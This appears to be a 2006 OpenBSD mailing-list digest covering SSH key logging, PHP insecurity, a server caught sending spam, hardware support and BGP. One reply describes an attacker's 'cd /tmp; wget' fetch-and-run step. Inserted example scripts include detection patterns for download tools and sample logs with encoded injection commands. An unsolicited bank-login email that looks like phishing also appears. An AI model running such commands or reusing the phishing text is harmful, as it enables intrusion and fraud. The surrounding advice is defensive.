tcpdump and 802.1d-support?
Is it planned that tcpdump will get support for 802.1d-Packets? Currently it reports that this type is an unknown packet-type. Kind regards, Sebastian
Re: IBM Thinkpad X40, which model?
On Wednesday, 25 January 2006 at 15:17:27 +0800, [EMAIL PROTECTED] wrote: I wonder which model is supported best by 3.8 or the coming 3.9. 2371-HSM works just fine on 3.8 current. Can hibernate work in X mode for that model ? CPU speed, video graphics, Wifi, etc... are not that important to me. The X40 comes with 3 macs out of the box...it's BUILT for wifi... I suggest you look elsewhere. No. What I really mean is 10Mbps or 54Mbps Wifi is no much a worry for me. Same as 1MB or 2MB cache. I have decided the X40. I want this laptop to run only OBSD and I travel a lot so I want a light weight one. I just want to know from the experience of the users in this list which particular model of the X40 works best in 3.8. Thanks, Zoong
Re: SSH publickey authentication - identity logging
Spruell, Darren-Perot wrote: From: Joachim Schipper [mailto:[EMAIL PROTECTED] Our situation is that we have a user account that multiple people have access to log into to retrieve files. Each user authenticates to that account with their own SSH key. Current log entry shows: Jan 24 11:01:20 sftp sshd[23555]: Accepted publickey for transfers from 10.2.58.44 port 1420 ssh2 Would be useful to have information logged for the connection identifying the key used to authenticate, by the key comment if possible. Does sshd already have this capability? Would anyone consider this a useful feature addition? Only if you can provide a good reason this can not be implemented as a couple of users and a shared group, combined with a group-writable directory. We require that the users be chroot'd to the home directory, so we'd probably have to break the chroot to have a commonly writable directory...?

sharing user accounts should be avoided if possible. i can't see why your situation would demand parting with good practices, if there aren't more particularities that you have left out.

tips:
* use permissions and directory structuring creatively.
* you don't have to chroot all the way to the actual homedir.
* users don't even have to have separate homedirs.
* contemplate what user privileges don't mix with chrooting.
* test, test, test.
Re: SSH publickey authentication - identity logging
On Tue, Jan 24, 2006 at 04:31:39PM -0700, Spruell, Darren-Perot wrote: From: Joachim Schipper [mailto:[EMAIL PROTECTED] Our situation is that we have a user account that multiple people have access to log into to retrieve files. Each user authenticates to that account with their own SSH key. Current log entry shows: Jan 24 11:01:20 sftp sshd[23555]: Accepted publickey for transfers from 10.2.58.44 port 1420 ssh2 Would be useful to have information logged for the connection identifying the key used to authenticate, by the key comment if possible. Does sshd already have this capability? Would anyone consider this a useful feature addition? Only if you can provide a good reason this can not be implemented as a couple of users and a shared group, combined with a group-writable directory. We require that the users be chroot'd to the home directory, so we'd probably have to break the chroot to have a commonly writable directory...? I don't know what method you use for that, but quite a few are flawed. It's not part of stock sshd last I checked, either. (Though it'd be neat.) Anyway, create a /home/workgroup in which to chroot, /home/workgroup/shared for the group-writable documents, and /home/workgroup/dave and so on for the users. This, of course, breaks as soon as someone is in more than two groups (some hacks might still be possible, but this will soon grow out of control). However, as to an actual solution, use the command= syntax in authorized_keys (see sshd(8), under 'AUTHORIZED_KEYS FILE FORMAT', as was pointed out to me on misc@ this week) to differentiate between keys, if desired. It's not occurring how a command= option could be used to provide logging of which key was used to authenticate as that user. What did you have in mind?
Something like

    command="/usr/local/bin/logme dave",no-port-forwarding,no-X11-forwarding ---hexblob for the key--- dave

With

    #!/bin/ksh
    /usr/bin/logger -t Dave logged in
    exec $SHELL

Of course, a compiled version of the above resists problems with the environment scrubbing a lot better, and might be preferable. This is not perfect though, as it is possible to run ssh without executing a command. no-port-forwarding and no-X11-forwarding take away any useful application of this, as far as I know. It is also inconvenient, as I rather like the ability to run a quick command on a remote host, but it does work. Joachim
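A fuller version of the forced-command wrapper sketched in the message above, as an added example that is not part of the original post: it logs a per-key label with the client address and still honours a one-off remote command through SSH_ORIGINAL_COMMAND. The path /usr/local/bin/logme, the label dave and the syslog tag keylog are assumptions.

```shell
#!/bin/sh
# Added example (not from the original thread): forced-command wrapper that
# records which authorized_keys entry was used on a shared account.
#
# Assumed authorized_keys entry, one label per key (key blob elided):
#   command="/usr/local/bin/logme dave",no-port-forwarding,no-X11-forwarding ssh-rsa AAAA... dave

# Reduce the label to characters that are safe in a log field.
sanitize_label() {
    printf '%s' "$1" | tr -cd 'A-Za-z0-9._-'
}

# Build the log message from: key label, $SSH_CONNECTION, $SSH_ORIGINAL_COMMAND.
log_message() {
    label=$(sanitize_label "$1")
    client=${2%% *}    # first field of SSH_CONNECTION is the client address
    if [ -n "$3" ]; then
        # The requested command is client-controlled: drop control characters
        # so it cannot inject extra lines into the log.
        cmd=$(printf '%s' "$3" | tr -d '[:cntrl:]')
        printf 'key=%s from=%s command=%s' \
            "${label:-unlabelled}" "${client:-unknown}" "$cmd"
    else
        printf 'key=%s from=%s interactive' \
            "${label:-unlabelled}" "${client:-unknown}"
    fi
}

main() {
    logger -p auth.info -t keylog \
        "$(log_message "$1" "${SSH_CONNECTION:-}" "${SSH_ORIGINAL_COMMAND:-}")"
    if [ -n "${SSH_ORIGINAL_COMMAND:-}" ]; then
        # Run the one-off command the client asked for, through the user's shell.
        exec "${SHELL:-/bin/sh}" -c "$SSH_ORIGINAL_COMMAND"
    fi
    exec "${SHELL:-/bin/sh}"
}

# sshd passes the label from command="..." as $1. Without a label nothing is
# run and the session ends.
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```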
Re: webstore software: safe and configurable?
On Tue, Jan 24, 2006 at 04:45:53PM -0700, Bob Beck wrote: However, all these mitigating points taken together do not suffice to convince me that PHP is the language to choose if you want to lead a quiet, secure life. Language has very little to do with it. The code that is written in the language is usually the problem :) ... [1] Though this is a bit of an abuse in statistics; open source web applications are full of easy-to-find holes, and since PHP has almost a monopoly there and is almost never used elsewhere, so are almost all PHP applications. It would not be unreasonable to say that a large portion of web applications is just badly written. The point stands that PHP makes it too easy to write bad code, but still. ... People write bad code in everything. The way people write software and heave it out the door to the slobbering masses that don't care about how bad it works has everything to do with it. Nothing will change until programmers of the applications are in general, smarter. That won't change without some evolutionary pressure to make them so, the only thing that will do that is people refusing to run crap and pushing back. Turning I don't like running crap into I don't like running language X is not helpful in this regard - the crap writers just move to another language-du-jour, make another application and pop up somewhere else - it's like playing whack-a-turd. I don't like running crap no matter what it's written in. Yes, I'm sometimes forced, I spent today fixing imp/horde and mysql issues. My crap-o-meter is overfull, I feel dirty - someone needs to send me some nice wholesome german scheisse porn so I can be convinced that not all the world is so smeared full of crap as the software I spent today looking at. All good points. That, however, still leaves my point standing that by evading PHP, you evade the worst crap.
I agree that it's possible to do really stupid things in any language (though I think PHP makes it far too easy[1][2]), and that webmonkeys (sorry, web application developers who have not yet reached the epitome of their art) will always write crap in whatever the language-du-jour is. On a side note, hand-writing your own web scripts helps you evade almost all of the crap - or at least, it'll be *your* crap. However, since one has to deal with the pile of crap that is MSIE anyway (--- long rant deleted ---), best to steer clear of web development at all. Which, on a side note to this side note, does a very good job; The Crap is still Out There, of course, but being rid of it as soon as you close your browser is a good thing. All this has no bearing on the fact that PHP, as a language, has a lot of holes. This is independent of the programs you write in it, though only having well-written programs on a server might make the problems (almost) impossible to exploit. As to IMP, I still haven't got it working. Might have something to do with my reluctance to run two versions of PHP, and my unwillingness to indulge crap that still demands PHP4. Another try coming up, probably... (though at least I can use PostgreSQL, which I far prefer to MySQL). Joachim [1] Whoever made up such works of genius as register_globals, regexes which execute stuff, and XML-RPC: all the world thanks you for it. [2] I've also heard it say that quite a few modern scripting languages are far too easy; this might be, to some extent, true, as a language like C - full of obscure portability problems, NULL dereferences, hard-to-find bugs which only rear their ugly head to shout SIGSEGV once in a while - does scare off most of the monkeys. Then again, at least PHP doesn't have buffer overflows (or, rather, at least programs written in PHP don't/shouldn't have buffer overflows).
Re: IBM Thinkpad X40, which model?
Zoong, Perhaps you should take a look at: http://www.openbsd.org/i386-laptop.html -- Warm regards, Kevin Foo Key fingerprint : 4B23 FC1C E50B 9693 CCDD 2A7D A048 E909 8924 9BDD Public key : http://keyserver.linux.it/pks/lookup?op=getsearch=0xA048E90989249BDD On Wednesday 25 January 2006 17:14, Zoong PHAM wrote: On Wednesday, 25 January 2006 at 15:17:27 +0800, [EMAIL PROTECTED] wrote: I wonder which model is supported best by 3.8 or the coming 3.9. 2371-HSM works just fine on 3.8 current. Can hibernate work in X mode for that model ? CPU speed, video graphics, Wifi, etc... are not that important to me. The X40 comes with 3 macs out of the box...it's BUILT for wifi... I suggest you look elsewhere. No. What I really mean is 10Mbps or 54Mbps Wifi is no much a worry for me. Same as 1MB or 2MB cache. I have decided the X40. I want this laptop to run only OBSD and I travel a lot so I want a light weight one. I just want to know from the experience of the users in this list which particular model of the X40 works best in 3.8. Thanks, Zoong
FSC D1627-C and hw.sensors
Hello. I have a Fujitsu Siemens D1627-C motherboard and with OpenBSD 3.9-beta (dmesg at end) I can not see any hw.sensors.

# /sbin/sysctl hw
hw.machine=i386
hw.model=Intel(R) Pentium(R) 4 CPU 3.20GHz (GenuineIntel 686-class)
hw.ncpu=1
hw.byteorder=1234
hw.physmem=1072717824
hw.usermem=1072488448
hw.pagesize=4096
hw.disknames=cd0,cd1,wd0
hw.diskcount=3
hw.cpuspeed=3192
hw.setperf=100

In Microsoft Windows XP (SP2) I use the program SpeedFAN, which prints the following log

Win9x:NO 64Bit:NO GiveIO:YES SpeedFan:YES
I/O properly initialized
Linked ISA BUS at $0290
Linked Intel 82801EB ICH5 SMBUS at $2000
Scanning ISA BUS at $0290...
SuperIO Chip=LPC47m967
Scanning Intel SMBus at $2000...
FS Hermes (REV=$10) found on SMBus at $73
SMART Enabled for drive 0
Found WDC WD2500PD-07FZB1 (250,1GB)
End of detection
Error loading event -- CfgVersion=01.0001 EventsVersion=01.0001
Loaded 0 events

and then shows

Fan1: 0 RPM
Fan2: 1320 RPM
Fan3: 1400 RPM

where Fan1 seems to be a ghost without connector, Fan2 is the CPU fan and Fan3 is an extra fan connector on the motherboard. It also shows

Temp1: 35 C
Temp2: 26 C
Temp3: 127 C
HD0: 23 C

where Temp1 is the CPU temp, Temp2 is some kind of case temp and Temp3 always says 127 C. HD0 I think is read from SMART. It also shows the voltage for +12, +5 and vbat. Is this an odd Fujitsu Siemens sensor that OpenBSD does not yet support?

Jan J

OpenBSD 3.9-beta (GENERIC) #591: Thu Jan 19 12:32:39 MST 2006 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC cpu0: Intel(R) Pentium(R) 4 CPU 3.20GHz (GenuineIntel 686-class) 3.20 GHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,SBF,SSE3,MWAIT,CNXT-ID real mem = 1072717824 (1047576K) avail mem = 972111872 (949328K) using 4278 buffers containing 53739520 bytes (52480K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(c0) BIOS, date 10/11/04, BIOS32 rev.
0 @ 0xfd6c0 apm0 at bios0: Power Management spec V1.2 apm0: AC unknown, no battery apm0: flags 30102 dobusy 0 doidle 1 pcibios0 at bios0: rev 2.1 @ 0xfd6c0/0x940 pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xfdef0/240 (13 entries) pcibios0: PCI Interrupt Router at 000:31:0 (Intel 82371FB ISA rev 0x00) pcibios0: PCI bus #2 is the last bus bios0: ROM list: 0xc/0xd000 0xcd000/0x1800 cpu0 at mainbus0 pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82865G/PE/P CPU-I/0-1 rev 0x02 ppb0 at pci0 dev 1 function 0 Intel 82865G/PE/P CPU-AGP rev 0x02 pci1 at ppb0 bus 1 vga1 at pci1 dev 0 function 0 ATI Radeon 9200 PRO rev 0x01 wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) ATI Radeon 9200 PRO Sec rev 0x01 at pci1 dev 0 function 1 not configured uhci0 at pci0 dev 29 function 0 Intel 82801EB/ER USB rev 0x02: irq 11 usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered uhci1 at pci0 dev 29 function 1 Intel 82801EB/ER USB rev 0x02: irq 10 usb1 at uhci1: USB revision 1.0 uhub1 at usb1 uhub1: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub1: 2 ports with 2 removable, self powered uhci2 at pci0 dev 29 function 2 Intel 82801EB/ER USB rev 0x02: irq 9 usb2 at uhci2: USB revision 1.0 uhub2 at usb2 uhub2: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub2: 2 ports with 2 removable, self powered uhci3 at pci0 dev 29 function 3 Intel 82801EB/ER USB rev 0x02: irq 11 usb3 at uhci3: USB revision 1.0 uhub3 at usb3 uhub3: Intel UHCI root hub, rev 1.00/1.00, addr 1 uhub3: 2 ports with 2 removable, self powered ehci0 at pci0 dev 29 function 7 Intel 82801EB/ER USB2 rev 0x02: irq 5 usb4 at ehci0: USB revision 2.0 uhub4 at usb4 uhub4: Intel EHCI root hub, rev 2.00/1.00, addr 1 uhub4: 8 ports with 8 removable, self powered ppb1 at pci0 dev 30 function 0 Intel 82801BA AGP rev 0xc2 pci2 at ppb1 bus 2 fxp0 at pci2 
dev 8 function 0 Intel PRO/100 VE rev 0x02, i82562: irq 11, address 00:30:05:60:93:05 inphy0 at fxp0 phy 1: i82562ET 10/100 PHY, rev. 0 fxp1 at pci2 dev 11 function 0 Intel 8255x rev 0x0c, i82550: irq 10, address 00:02:b3:2b:b2:89 inphy1 at fxp1 phy 1: i82555 10/100 PHY, rev. 4 vendor Conexant, unknown product 0x8800 (class multimedia subclass video, rev 0x05) at pci2 dev 13 function 0 not configured vendor Conexant, unknown product 0x8811 (class multimedia subclass miscellaneous, rev 0x05) at pci2 dev 13 function 1 not configured emu0 at pci2 dev 15 function 0 Creative Labs SoundBlaster Audigy rev 0x04: irq 5 ac97: codec id 0x83847650 (SigmaTel STAC9750/51) ac97: codec features headphone, 20 bit DAC, 20 bit ADC, SigmaTel 3D audio0 at emu0 Creative Labs SoundBlaster Audigy Digital rev 0x04 at pci2 dev 15 function 1 not configured Creative Labs Firewire rev 0x04 at pci2 dev 15 function 2 not configured ichpcib0 at pci0 dev 31 function 0 Intel 82801EB/ER LPC rev 0x02 pciide0 at pci0 dev 31 function 1 Intel 82801EB/ER IDE
Online Account Access
Dear NYCE Corporation valued member, our company recently issued a new feature regarding our services to you, Online Access to your accounts! Accessing your NYCE account over the Internet is easier than you might think! Check balances, get transaction histories, pay bills, transfer funds and more. Please take 10 minutes off your time, access the link below, and get started on enrolling yourself! http://online.nyce.net/ © 2006 NYCE CORPORATION, Member FDIC. Equal Housing Lender Thank You for your prompt attention to this matter! * Please do not reply to this message. For any inquiries, contact Customer Service.
Re: SSH, sftp-server subsystem not logging to utmp ?
On Mon, Jan 23, 2006 at 11:10:16PM +0200, turha turha wrote: users are added, I'm guessing sftp-server doesn't inherit this functionality from ssh either, so is there any place to adjust the behavior ? or am I supposed to use some other tool to monitor sftp usage ? authlog shows: date host sshd[pid]: subsystem request for sftp after (obviously) successful login, and lastcomm(1) gives some info too. - Lukasz Sztachanski -- 0x058B7133 // 16AB 4EBC 29DA D92D 8DBE BC01 FC91 9EF7 058B 7133 http://szati.blogspot.com http://szati.entropy.pl
Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
Sorry to bother you, but I would like to show you some aspects about how a Sendmail running on an OpenBSD 3.8 system can be involved in a spam attack. I'm not quite sure that OpenBSD 3.8 or Sendmail are exploitable, but I would like some help to clarify this problem. More precisely, one day I've noticed that /var/spool/mqueue was full with 3 messages (in fact return messages, showing that some servers including Yahoo! do not accept some mails from me). I've noticed that the mailstats command reports 13 (!!!) messages sent (!) outside. My computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the website; it's a FRESH install so that I don't think it's a problem in the system. I have around 30 users that use POP3+Outlook Express to send and receive their mail messages. The problem is that I have antispoofing on, scrub in all; some suspect (probably Windows machines from the neighbouring department which are supposed to have some viruses are blocked through the PF). I also have NAT for my local network (192.128.x.x) and ip forwarding for the global addresses. Relaying is stopped so this could not be a problem (Yahoo! asks me if I am an open-relay!). My machine seems quite secure, but I cannot say why my machine sends so much mail messages (day and night). Maybe some accounts are compromised, but I have no way of determining this. How can I see how many mail messages a user sends? I don't think this is an ordinary problem. I have some experience on FreeBSD (2 years) and on OpenBSD; moreover, I have 2.5 years of experience with GNU/Linux systems. Maybe this is a simple problem, but I can't solve it all by myself and thus I now requested help from our great OpenBSD community. My OpenBSD 3.8 system was not patched and the kernel was not recompiled. Thank you very much for your attention and I hope someone can help me with this (could it be problem with Sendmail on OpenBSD 3.8? - I really don't think this could happen). Respectfully yours, George Popa
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
On Wed, 2006-01-25 at 14:09 +0200, Gabriel George POPA wrote: small server running OpenBSD 3.8, MySQL+PHP+Apache for the website; I'd look here. Check out: http://secunia.com/advisories/17763/ You didn't post anything from maillog or headers of a rejected message, so this is only a guess. You need to look in /var/log/maillog and see where those messages are coming from. Also, look in php.ini and turn on debugging. Try disabling the php application and see if the messages stop. -- James Strandboge [EMAIL PROTECTED]
Security announces
http://docs.freebsd.org/cgi/mid.cgi?200601251013.k0PAD9lO059018 looks like http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net/if_bridge.c.diff?r1=1.147r2=1.148
OpenBGPD status
Over the last few weeks a lot of development happened in OpenBGPD. Many minor bugs were found and fixed. Additionally some memory leaks were plugged and the overall memory consumption was reduced. Now this would not be enough to make me write such a mail but we added a new important feature: Softreconfig in.

For a couple of months OpenBGPD was already doing softreconfig out. In other words on configuration reloads the output filters are rerun and the announced prefixes are correctly updated. Now with softreconfig in we do the same thing for the incoming filters. So reloading bgpd no longer results in unexpected RIB contents until you clear all sessions. Now the RIB is adjusted on reloads and so the result is always consistent. In the end it is no longer necessary to clear sessions on reload or even restart bgpd.

To implement this feature many complex changes had to be done in the RDE. Instead of duplicating every update and store it in different tables OpenBGPD merges these tables and so only changed entries are duplicated. This will reduce the memory overhead of softreconfig in drastically. Both zebra/quagga and Cisco's bgpd double more or less the memory consumption if softreconfig in is enabled.

So OpenBGPD users this is now a good time to install a -current snapshot on your test machines and play around with these new feature(s). This will help us to make softreconfig as solid as the rest of OpenBGPD. Thanks -- :wq Claudio

PS: here some small statistics from one of my test systems. The box is a Via C3 with 512M RAM and 11 full feeds

# bgpctl show rib mem
RDE memory statistics
177558 IPv4 network entries using 5.4M of memory
1920275 prefix entries using 58.6M of memory
355777 BGP path attribute entries using 23.1M of memory
324123 BGP AS-PATH attribute entries using 9.6M of memory, and holding 355777 references
7188 BGP attributes entries using 169K of memory and holding 289419 references
7187 BGP attributes using 122K of memory
RIB using 96.9M of memory
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
...on Wed, Jan 25, 2006 at 02:09:58PM +0200, Gabriel George POPA wrote: Yahoo! do not accept some mails from me). I've noticed that the mailstats command reports 13 (!!!) messages sent (!) outside. My computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the website; it's a FRESH install so that I don't think it's a problem in the system. I have around 30 users that use POP3+Outlook Express to send and receive their mail messages. It's quite improbable that your box can be used as relay without some additional software or some sort of configuration problem. How about some more info on what you are running on that web site? The usual feedback script abuse comes to mind. Also, you have all the logfiles on your machine, try to single out a specific spam message (I assume you have a few samples) and find out how it came into your system. Alex.
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
On 2006/01/25 14:09, Gabriel George POPA wrote: More precisely, one day I've noticed that /var/spool/mqueue was full with 3 messages (in fact return messages, showing that some servers including Yahoo! do not accept some mails from me). Some people send bulk email by putting the intended recipient in the *sender* address in the envelope. Recipient address needs to be something that will generate a bounce message (rather than an SMTP error code) in an attempt to get the message body returned as part of the bounce message (I was told some years ago that people used to do this in the early days of email to avoid charges for sending messages on some pay-per-message systems). OpenBSD sendmail configuration files (at least on -current, I don't recall when it was added) use the nobodyreturn privacy flag in the mc-file, to make this a less-than-successful operation (since the intended payload isn't carried in the bounce report). This may or may not be the problem you're seeing: you'll have to look at the headers in the queued emails and analyse them to find out for sure.
Re: Possible implication of a Sendmail on OpenBSD 3.8 in a spam attack
On Wednesday 25 January 2006 12:09, you wrote: ... I've noticed that the mailstats command reports 13 (!!!) messages sent (!) outside. My computer is a small server running OpenBSD 3.8, MySQL+PHP+Apache for the website;

There's one potential smoking gun right there. PHP. You know PGP stands for 'Pretty Good Privacy'? Well, I think PHP stands for 'Pretty Hopeless Privacy'. What PHP scripts are you or your users running? Any phpbb installations? *nukes? What other PHP scripts are installed? phpbb and the various nukes are notorious for exploits. It is quite often the case that well known PHP scripts are getting exploited - I've seen it twice in the field where a PHP script was exploited by phishers/spammers. The general sequence of events is:

1. User installs exploitable PHP script
2. Phisherman finds it.
3. Phisherman exploits it, and using the shell execution exploit, executes 'cd /tmp; wget some-evil-script.php' and then exploits it again to run /tmp/some-evil-script.php (in PHP command line mode). Some-evil-script.php turns out to be a spamming script.

They don't need to root your server, they just need to be able to write somewhere. Have a poke around where Apache has write access, I bet you find some dodgy PHP scripts. Look through the logs for attempted exploits on PHP scripts (you can usually find %-encoded versions of commands in the arguments to the PHP script).

The other possibility is one of your users has a virus/trojan/worm that uses their Outlook settings to relay mail through your mail server. Tell your users to relay through their ISP only, you just don't want to get involved with being the mail relay for your users if you can help it. However, I suspect you've been exploited via a buggy insecure PHP script.

To stop this happening again: Apply strict egress filtering. Allow *no traffic out at all*.
There is probably no reason your server should be making any outbound connections except via a few daemons (DNS and outbound SMTP spring to mind - for those use 'pf' rules that only allow BIND and sendmail to send data out on those ports). Strict egress filtering will prevent phishers/spammers from managing to do the 'wget some-evil-script.php' to get the spamming script onto your server. No, 'chmod 700 wget' is no substitute - it's trivial to write a Perl script that can be injected via your vulnerable PHP script to open a socket to a remote server and download a file. Block ALL OUTBOUND ACCESS to anything except for what explicitly should happen: DNS lookups to the two or three DNS servers listed in resolv.conf, and SMTP access (if you absolutely cannot avoid allowing outbound SMTP) to the sendmail process only (user _sendmail). Egress filtering is often forgotten, missed or not considered - but it is every bit as important as filtering inbound traffic (possibly more so, as you have discovered). Never forget egress filtering. And keep an eye on your users - particularly what PHP scripts they have installed. Apply a LART if they don't keep up to date with security patches. Have a policy of banning scripts known to have a bad security track record.
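The log review suggested in the message above (looking for %-encoded commands in the arguments to PHP scripts), as an added example that is not part of the original post. It assumes Apache common or combined log format; the sample log lines, addresses and script names are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original thread): flag requests to PHP scripts
# whose query string carries URL-encoded shell syntax.
# Input:  Apache common/combined log format on stdin.
# Output: one "client-address request-path" line per suspicious request.
suspicious_requests() {
    awk '
    {
        url = tolower($7)              # field 7 is the request path
        q = index(url, "?")
        if (q == 0) next               # no query string, nothing to inspect
        path = substr(url, 1, q - 1)
        if (path !~ /\.php/) next      # only requests handled by a PHP script
        query = substr(url, q + 1)

        # 1: a download tool followed by an encoded space
        # 2: an encoded "cd /tmp"
        # 3: encoded semicolon, pipe or backtick
        if (query ~ /(wget|curl|fetch|lynx)(%20|\+)/ ||
            query ~ /cd(%20|\+)(%2f|\/)tmp/ ||
            query ~ /%3b|%7c|%60/)
            print $1, $7
    }'
}

# Constructed sample input: two injection attempts, three benign requests.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [25/Jan/2006:10:01:02 +0200] "GET /index.php?page=news&id=4 HTTP/1.1" 200 5120
198.51.100.7 - - [25/Jan/2006:10:03:44 +0200] "GET /app/view.php?item=1%3Bcd%20/tmp%3Bwget%20http://example.invalid/x.php HTTP/1.0" 200 312
203.0.113.5 - - [25/Jan/2006:10:04:10 +0200] "GET /app/view.php?cmd=CURL+-O+http://example.invalid/y HTTP/1.0" 200 298
192.0.2.10 - - [25/Jan/2006:10:05:31 +0200] "GET /images/logo.png?v=%3B HTTP/1.1" 200 901
192.0.2.22 - - [25/Jan/2006:10:06:02 +0200] "GET /search.php?q=how+to+use+wget HTTP/1.1" 200 2210
EOF
}

sample_log | suspicious_requests
```

Access logs record only the request line, so parameters sent in a POST body are not visible to this check.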
OpenBSD-specific plugins for Munin, anyone?
Hi, I've recently been playing with Munin again (http://munin.projects.linpro.no/), and noticed there are nearly no plugins for OpenBSD. While I have adapted a few for my needs, I surely can't be the first to do that? (Munin is a(nother) simple, low-configuration software using rrdtool to create pretty graphs of different things happening on networked systems. I'm using it because I'm lazy. Having to write my own plugins is bad in that respect.) Alex.
RE: Re: webstore software: safe and configurable?
[EMAIL PROTECTED] wrote: [snip] All good points. That, however, still leaves my point standing that by evading PHP, you evade the worst crap. True, but that is the same as that by evading ENGLISH as a language in posts, you evade the worst crap. If these discussions were carried out in classical latin, the level of discussion would rise considerably. This is the same as registering automobiles in Antarctica because they have fewer accidents there. An oversimplification, but an ill-written application has essentially two choices. It can refuse to run because somebody forgot to dot an i or something, or it can try to run anyway with what seems reasonable under the circumstances. Ultimately everything is really only some variant of choice number two. (Understand ALL of the foundations of mathematics if you think otherwise.) There is an enormous difference between sometimes doing something right and never doing anything wrong. There was something about an error every few lines in C compilers. You think a webstore something is better?
enable the Fn key of my keyboard in my OpenBSD 3.8
Hi all, Is there any way to enable the Fn key of my keyboard in my OpenBSD 3.8 and configure the delete key? Because right now the delete key is working the same way backspace does, and the Fn key is useless. Thanks. -- Joco Salvatti Undergraduating in Computer Science Federal University of Para - UFPA web: http://salvatti.expert.com.br e-mail: [EMAIL PROTECTED]
Re: Anonym.OS - OpenBSD-based live CD
On Tue, 24 Jan 2006, Bob Beck wrote: SNIP or perhaps a brief dorothy-esque moment of clicking my ruby slippers together and saying ignorance is bliss. SNIP -Bob and what size would those ruby slippers be?
Encrypting content/filesystem on DVD?
Hi, This may not be OpenBSD specific, but I'm looking for a way to encrypt the contents of a DVD such that only a user with the correct passphrase would be able to mount the contents. Sort of an optical equivalent to:

vnconfig -ck svnd0 my-encrypted-file
mount /dev/svnd0c /mount-point

My initial thoughts were to simply store an encrypted vnd file filesystem as the only contents of a normal ISO9660 DVD, mount the DVD as always and then attach a vnd device to the file stored on the DVD using vnconfig, as above. Unfortunately, neither mkisofs (and indeed the iso standard) nor growisofs appear to like 4G+ files ... The encrypted content may represent a reasonably large filesystem in one large file under this scheme.

My attempts at burning an ffs filesystem to DVD/CDR to get around the filesize limitation of ISO9660 have been largely unsuccessful. See below for details on the (flawed) procedure I initially attempted. I'm sure I'm missing some crucial details -- blocksizes or similar. As an aside, I'm also curious how one might successfully burn an ffs filesystem to a DVD/CD such that OpenBSD can mount it, if such a thing is even possible.

The contents only have to be mounted/read via an OpenBSD box. I'm not concerned with interoperability with other architectures or making the disk bootable. I'm not stuck on any particular method of producing the encrypted contents. Using vnd devices with a large file stored on a standard ISO filesystem only seemed like a logical and familiar approach for me and if the size of the file didn't trample ISO's limits, it would have worked fine, I suspect. I'm open to any suggestions on how else this might be most easily accomplished.
Regards, - Paul

*** cdrw-ffs filesystem procedure -- comments in () ***
*** OpenBSD 3.8 GENERIC ***

(create a virtual filesystem)
# dd if=/dev/zero of=tst.fs bs=1024 count=10240
# vnconfig -c svnd2 tst.fs
# newfs -f 2048 /dev/svnd2c
newfs: /dev/svnd2c: not a character-special device
Warning: cylinder groups must have a multiple of 8 cylinders
Warning: 20 sector(s) in last cylinder unallocated
/dev/svnd2c:20480 sectors in 205 cylinders of 1 tracks, 100 sectors
10.0MB in 1 cyl groups (208 c/g, 10.16MB/g, 1408 i/g)
super-block backups (for fsck -b #) at:
32, (reference)
# disklabel svnd2
# /dev/rsvnd2c:
type: SCSI
disk: vnd device
label: fictitious
flags:
bytes/sector: 512
sectors/track: 100
tracks/cylinder: 1
sectors/cylinder: 100
cylinders: 204
total sectors: 20480
rpm: 3600
interleave: 1
trackskew: 0
cylinderskew: 0
headswitch: 0 # microseconds
track-to-track seek: 0 # microseconds
drivedata: 0

16 partitions:
# size offset fstype [fsize bsize cpg]
c: 20480 0 4.2BSD 2048 16384 208 # Cyl 0 - 204*

(put something into the ffs image file - tst.fs)
# mkdir tstmnt
# mount /dev/svnd2c tstmnt
# touch tstmnt/hello_world
# umount tstmnt
# vnconfig -u svnd2

(burn it ...)
(Note: cdrecord installed from binary package using pkg_add crdtools-2.01)
# cdrecord -v dev=/dev/rcd0c tst.fs
cdrecord: No write mode specified.
cdrecord: Asuming -tao mode.
cdrecord: Future versions of cdrecord may have different drive dependent defaults.
cdrecord: Continuing in 5 seconds...
Cdrecord-Clone 2.01 (i386-unknown-openbsd3.8) Copyright (C) 1995-2004 Jvrg Schilling
TOC Type: 1 = CD-ROM
scsidev: '/dev/rcd0c'
devname: '/dev/rcd0c'
scsibus: -2 target: -2 lun: -2
Using libscg version 'schily-0.8'.
SCSI buffer size: 61440
atapi: 0
Device type: Removable CD-ROM
Version: 0
Response Format: 2
Capabilities :
Vendor_info: 'PIONEER '
Identifikation : 'DVD-RW DVR-106D'
Revision : '1.06'
Device seems to be: Generic mmc2 DVD-R/DVD-RW.
Current: 0x000A
Profile: 0x001B
Profile: 0x001A
Profile: 0x0014
Profile: 0x0013
Profile: 0x0011
Profile: 0x0010
Profile: 0x000A (current)
Profile: 0x0009 (current)
Profile: 0x0008
cdrecord: This version of cdrecord does not include DVD-R/DVD-RW support code.
cdrecord: If you need DVD-R/DVD-RW support, ask the Author for cdrecord-ProDVD.
cdrecord: Free test versions and free keys for personal use are at ftp://ftp.berlios.de/pub/cdrecord/ProDVD/
Using generic SCSI-3/mmc CD-R/CD-RW driver (mmc_cdr).
Driver flags : MMC-3 SWABAUDIO BURNFREE
Supported modes: TAO PACKET SAO SAO/R96P SAO/R96R RAW/R16 RAW/R96P RAW/R96R
Drive buf size : 1267712 = 1238 KB
FIFO size : 4194304 = 4096 KB
Track 01: data 10 MB
Total size: 11 MB (01:08.29) = 5122 sectors
